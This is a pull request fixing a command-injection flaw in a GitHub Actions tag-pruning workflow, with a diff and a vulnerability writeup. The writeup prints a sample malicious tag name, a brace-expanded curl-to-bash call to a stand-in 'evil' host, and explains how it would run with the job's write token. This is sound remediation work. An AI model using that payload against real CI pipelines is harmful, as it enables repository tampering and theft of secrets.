### PR TITLE
Pass github.ref_name to the tag-pruning script through an environment variable

### DIFF
--- a/.github/workflows/prune-tags.yml
+++ b/.github/workflows/prune-tags.yml
@@ -22,8 +22,10 @@ jobs:
           fetch-depth: 0
 
       - name: Prune non-production tags
+        env:
+          REF_NAME: ${{ github.ref_name }}
         run: |
-          tags=( $(.github/list-prune-tags.sh -n ${{ github.ref_name }}) )
+          tags=( $(.github/list-prune-tags.sh -n "$REF_NAME") )
 
           # we'll stop early if we don't find any tags to prune
           if [ ${#tags[*]} -eq 0 ]; then


### PR DESCRIPTION
### Which issue this PR addresses:

Fixes: [August remediation finding](<https://portal.microsofticm.com/imp/v5/incidents/details/850008257/summary>)

### What this PR does / why we need it:

This PR fixes a command-injection vulnerability in the tag pruning GitHub Actions workflow. It passes the untrusted `github.ref_name` value through a step environment variable and expands it as a quoted argument.

### Test plan for issue:

- Validated the workflow using `actionlint v1.7.7`
- Confirmed that a git-valid, command injection shaped tag is passed as data and does not execute embedded payload

### Is there any documentation that needs to be updated for this PR?

No

### How do you know this will function as expected in production? 

The tag-pruning behavior remains unchanged for normal tags. the current tag is still passed to `list-prune-tags.sh` as the excluded tag. The only behavioral change is that shell metacharacters in a tag name remain literal data instead of being parsed as executable syntax.

###The Vulnerability Details
```Line 26 of prune-tags.yml is: `tags=( $(.github/list-prune-tags.sh -n ${{ github.ref_name }}) )`. The workflow triggers on `push` of any tag (`tags: - '**'`) and grants `permissions: contents: write`. The `${{ github.ref_name }}` expression evaluates to the pushed tag's short name and is substituted by the Actions runner directly into the shell script text before bash parses it. Git ref-name rules (git check-ref-format) forbid spaces, control characters, and ~ ^ : ? * [ \, but PERMIT the shell metacharacters $ ( ) ` ; & | { } < >. Spaces can be avoided with ${IFS}. Therefore a tag such as `$({curl,-s,[https://evil/x}|bash)`](https://evil/x%7D%7Cbash)%60) is a valid ref name and, when substituted, turns line 26 into a nested command substitution that executes attacker-controlled commands in the runner. The inner list-prune-tags.sh script's own handling of its argument is irrelevant because the injection resolves at shell-parse time, before the script is even invoked. The injected code inherits the job's GITHUB_TOKEN (contents: write), enabling repository tampering (delete/push tags and branches, push commits) and access to any secrets exposed to the job. This matches the canonical GitHub-documented script-injection anti-pattern; the correct fix is to pass the value through an environment variable (e.g., `env: REF: ${{ github.ref_name }}`) and reference it quoted (`"$REF"`) so the runner never injects it into the script body. The finding is a true positive. The only open question is the magnitude of the privilege boundary crossed, which depends on the repo's tag-push permission and review configuration — hence a quality→important range rather than a single rating```